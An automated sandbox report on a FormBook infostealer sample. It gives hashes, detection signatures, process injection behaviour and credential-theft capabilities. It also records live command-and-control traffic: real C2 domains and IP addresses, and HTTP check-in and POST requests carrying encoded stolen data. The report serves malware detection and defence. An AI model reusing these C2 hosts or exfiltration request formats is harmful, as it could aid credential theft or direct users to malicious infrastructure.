Edit tour

Windows Analysis Report
5by4QM3v89.exe

Overview

General Information

Sample name:	5by4QM3v89.exe renamed because original name is a hash value
Original sample name:	959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f.exe
Analysis ID:	1588594
MD5:	6c05e87405d63cb15d69816adabe9910
SHA1:	c99d0840f3a45216f78c126aa9f2338903759d15
SHA256:	959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

5by4QM3v89.exe (PID: 8020 cmdline: "C:\Users\user\Desktop\5by4QM3v89.exe" MD5: 6C05E87405D63CB15D69816ADABE9910)

svchost.exe (PID: 8104 cmdline: "C:\Users\user\Desktop\5by4QM3v89.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

rVnDkmUdXXPrwb.exe (PID: 4880 cmdline: "C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

control.exe (PID: 7748 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)

rVnDkmUdXXPrwb.exe (PID: 6248 cmdline: "C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.26a0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.26a0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ParentImage: C:\Users\user\Desktop\5by4QM3v89.exe, ParentProcessId: 8020, ParentProcessName: 5by4QM3v89.exe, ProcessCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ProcessId: 8104, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ParentImage: C:\Users\user\Desktop\5by4QM3v89.exe, ParentProcessId: 8020, ParentProcessName: 5by4QM3v89.exe, ProcessCommandLine: "C:\Users\user\Desktop\5by4QM3v89.exe", ProcessId: 8104, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:53:41.780016+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49971	162.0.215.91	80	TCP
2025-01-11T02:54:05.302271+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49975	194.58.112.174	80	TCP
2025-01-11T02:54:18.704444+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49979	199.192.23.123	80	TCP
2025-01-11T02:54:32.005451+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49983	66.29.146.78	80	TCP
2025-01-11T02:54:45.193298+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49987	84.32.84.32	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 5by4QM3v89.exe	Virustotal: Detection: 63%			Perma Link
Source: 5by4QM3v89.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 5by4QM3v89.exe

Joe Sandbox ML: detected

Source: 5by4QM3v89.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rVnDkmUdXXPrwb.exe, 00000004.00000000.1757884591.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906924468.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003F445A
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FC6D1 FindFirstFileW,FindClose,	0_2_003FC6D1
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_003FC75C
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003FEF95
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003FF0F2
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003FF3F3
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003F37EF
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003F3B12
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_003FBCBC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 4x nop then pop edi

2_2_026B8C4A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49975 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 199.192.23.123:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49983 -> 66.29.146.78:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49971 -> 162.0.215.91:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49987 -> 84.32.84.32:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.athanasopoulos.xyz

Source: Joe Sandbox View

IP Address: 84.32.84.32 84.32.84.32

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_004022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004022EE

Source: global traffic	HTTP traffic detected: GET /3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.hirmic4820voe.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.happytrail.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /01kd/?0lTTc=Bwd2OemdLjmJMGV3rhrX5wcyn7e37k0HlZ2ImklC1ZcabiHtTZNjzLKNphAXpIzoErDL03bbR9rC7Ulfl1FOK5c2VAGA3RdE9RsClYyfxzqaNIzCHQ==&LR=KBvPk HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.spinpinang01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.athanasopoulos.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.hirmic4820voe.shop
Source: global traffic	DNS traffic detected: DNS query: www.elinor.club
Source: global traffic	DNS traffic detected: DNS query: www.happytrail.life
Source: global traffic	DNS traffic detected: DNS query: www.spinpinang01.click
Source: global traffic	DNS traffic detected: DNS query: www.athanasopoulos.xyz

Source: unknown

HTTP traffic detected: POST /izuw/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.elinor.clubOrigin: http://www.elinor.clubReferer: http://www.elinor.club/izuw/Content-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: max-age=0Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 53 34 48 50 49 39 4c 72 43 4f 57 45 6f 4c 4c 56 61 4e 38 50 38 4d 4e 62 44 6e 62 56 53 43 45 51 78 70 71 6c 67 4c 63 62 44 64 36 4e 70 73 52 41 38 34 46 6b 45 37 2f 4e 55 2b 65 65 47 4d 34 59 4b 72 54 50 6a 70 77 72 61 2f 31 6c 54 6c 66 36 54 39 56 6a 4a 72 6c 72 79 6b 4c 69 37 76 4b 36 68 36 2b 32 71 47 65 68 69 69 55 39 65 53 76 39 6e 50 4b 78 72 77 47 42 4f 6b 32 6e 35 47 63 45 69 45 33 48 4e 46 71 79 39 57 6b 55 61 70 4b 47 76 66 61 61 7a 66 63 43 5a 7a 31 59 78 34 6d 67 71 51 4d 4a 56 6f 6d 4c 37 6e 47 5a 64 55 75 65 Data Ascii: 0lTTc=msZ4rMLyjYtOS4HPI9LrCOWEoLLVaN8P8MNbDnbVSCEQxpqlgLcbDd6NpsRA84FkE7/NU+eeGM4YKrTPjpwra/1lTlf6T9VjJrlrykLi7vK6h6+2qGehiiU9eSv9nPKxrwGBOk2n5GcEiE3HNFqy9WkUapKGvfaazfcCZz1Yx4mgqQMJVomL7nGZdUue

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 01:53:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 